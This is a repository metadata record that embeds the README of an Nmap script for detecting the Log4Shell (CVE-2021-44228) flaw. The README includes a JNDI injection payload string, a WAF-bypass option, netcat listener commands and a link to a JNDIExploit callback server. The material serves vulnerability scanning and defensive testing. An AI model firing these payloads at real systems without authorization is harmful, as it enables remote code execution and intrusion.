{"id":22579764,"url":"https://github.com/giterlizzi/nmap-log4shell","last_synced_at":"2025-08-23T22:08:22.688Z","repository":{"id":148320721,"uuid":"438012376","full_name":"giterlizzi/nmap-log4shell","owner":"giterlizzi","description":"Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)","archived":false,"fork":false,"pushed_at":"2021-12-17T17:23:57.000Z","size":24,"stargazers_count":79,"open_issues_count":2,"forks_count":21,"subscribers_count":5,"default_branch":"main","last_synced_at":"2025-03-24T16:02:58.814Z","etag":null,"topics":["cve-2021-44228","log4j","log4shell","nmap","nmap-scripts","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Lua","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/giterlizzi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-13T20:17:14.000Z","updated_at":"2024-12-04T01:38:34.000Z","dependencies_parsed_at":"2023-05-19T18:30:35.444Z","dependency_job_id":null,"html_url":"https://github.com/giterlizzi/nmap-log4shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/giterlizzi%2Fnmap-log4shell/manifests","owner_url":"
https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/giterlizzi","download_url":"https://codeload.github.com/giterlizzi/nmap-log4shell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248270569,"owners_count":21075795,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-44228","log4j","log4shell","nmap","nmap-scripts","vulnerability"],"created_at":"2024-12-08T05:12:10.937Z","updated_at":"2025-04-10T18:22:45.583Z","avatar_url":"https://github.com/giterlizzi.png","language":"Lua","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)\n\n`nmap-log4shell` is an NSE script for discovering the Apache Log4j RCE ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) vulnerability across the network. The script can inject the **log4shell** exploit payload via HTTP headers (default) or via a TCP/UDP socket.\n\n## Vulnerability\n\n**CVE-2021-44228** is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. 
The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:\n\n-  Lightweight Directory Access Protocol (LDAP)\n-  Secure LDAP (LDAPS)\n-  Remote Method Invocation (RMI)\n-  Domain Name Service (DNS)\n\nIf the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server. Successful exploitation could lead to RCE.\n\n\n## Installation\n\nFind where Nmap scripts are stored on your system:\n\n- for *nix systems it might be `~/.nmap/scripts/` or `$NMAPDIR`\n- for Mac it might be `/usr/local/Cellar/nmap/\u003cversion\u003e/share/nmap/scripts/`\n- for Windows it might be `C:\\Program Files (x86)\\Nmap\\scripts`\n\nCopy the provided script (log4shell.nse) into that directory, then run `nmap --script-updatedb` to update the Nmap script DB.\n\n\n## Usage\n\n    nmap --script log4shell.nse --script-args log4shell.callback-server=172.17.42.1:1389 -p 8080 172.17.42.2 \n    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 21:26 CET\n    Nmap scan report for 172.17.42.1\n    Host is up (0.000096s latency).\n\n    PORT     STATE SERVICE\n    8080/tcp open  http-proxy\n    | log4shell: \n    |   Payloads:\n    |     ${jndi:ldap:/172.17.42.1:389/log4shell}\n    |   Test Method: HTTP\n    |   URL Path: /\n    |   HTTP Method: GET\n    |   HTTP Headers: \n    |     Access-Control-Request-Method: 200 \n    |     Accept: 200 \n    |     Access-Control-Request-Headers: 200 \n    |     Accept-Charset: 200 \n    |     X-Api-Version: 200 \n    |     Warning: 200 \n    |     Pragma: 200 \n    |     Upgrade-Insecure-Requests: 200 \n    |     Range,: 400 \n    |     Hostname: 200 \n    |     Content-Length: 400 \n    |     Dnt: 200 \n    |     Date: 200 \n    |     Username: 200 \n    |     Content-Encoding: 200 \n    |     Content-Type: 200 \n    |     Forwarded: 200 \n    |     Max-Forwards: 200 \n    |     
Accept-Encoding: 200 \n    |     Referer: 200 \n    |     IP: 200 \n    |     IPaddress: 200 \n    |     X-Amz-Date: 200 \n    |     X-Amz-Target: 200 \n    |     TE: 200 \n    |     Content-Disposition: 200 \n    |     X-Requested-With: 200 \n    |     upgrade-insecure-requests: 200 \n    |     Authorization: 200 \n    |     Cookie: 200 \n    |     User-Agent: 200 \n    |     Accept-Language: 200 \n    |     Proxy-Authorization: 200 \n    |     Expect: 417 \n    |     From: 200 \n    |     Accept-Datetime: 200 \n    |     X-CSRF-Token: 200 \n    |     Origin: 200 \n    |_  Note: (!) Inspect the callback server (172.17.42.1:389) or web-application (172.17.42.2:8080) logs\n\n\n### Arguments\n\n- `log4shell.callback-server`: The callback server (e.g. `172.17.42.1:1389`)\n- `log4shell.http-headers`: Comma-separated list of HTTP headers (e.g. `X-Api-Version,User-Agent,Referer`)\n- `log4shell.http-method`: HTTP method (default: `GET`)\n- `log4shell.url-path`: URL path (default: `/`)\n- `log4shell.waf-bypass`: Use WAF bypass payloads (default: `false`)\n- `log4shell.test-method`: Test through `http` (default), `tcp`, `udp` or `all`\n\n\n### Callback Server\n\nThe script relies on callbacks from the target being scanned, and hence any firewall rules or interaction with other security devices will affect the efficacy of the script.\n\n\n#### Netcat or Ncat\n\nListen on a TCP port with netcat (or ncat):\n\n    ncat -vkl 1389   # Ncat\n    nc -lvnp 1389    # Netcat\n\nRun Nmap with the `log4shell.nse` script:\n\n    nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p \u003cport\u003e] \u003ctarget\u003e\n\nSee the target IP address in the netcat (or ncat) output:\n\n    Ncat: Connection from 172.17.0.2.\n    Ncat: Connection from 172.17.0.2:38898.\n\n#### JNDIExploit\n\nDownload JNDIExploit from GitHub (https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip)\n\nStart the JNDIExploit server:\n\n    java -jar 
JNDIExploit.jar\n\nRun Nmap with the `log4shell.nse` script:\n\n    nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p \u003cport\u003e] \u003ctarget\u003e\n\nCheck the JNDIExploit output to see the received LDAP query:\n\n    [+] Received LDAP Query: log4shell\n    [!] Invalid LDAP Query: log4shell\n\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of nmap-log4shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n\n# License\n\nThe project is licensed under MIT License.\n\n\n# Author\n\n- Giuseppe Di Terlizzi (giterlizzi)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgiterlizzi%2Fnmap-log4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgiterlizzi%2Fnmap-log4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgiterlizzi%2Fnmap-log4shell/lists"}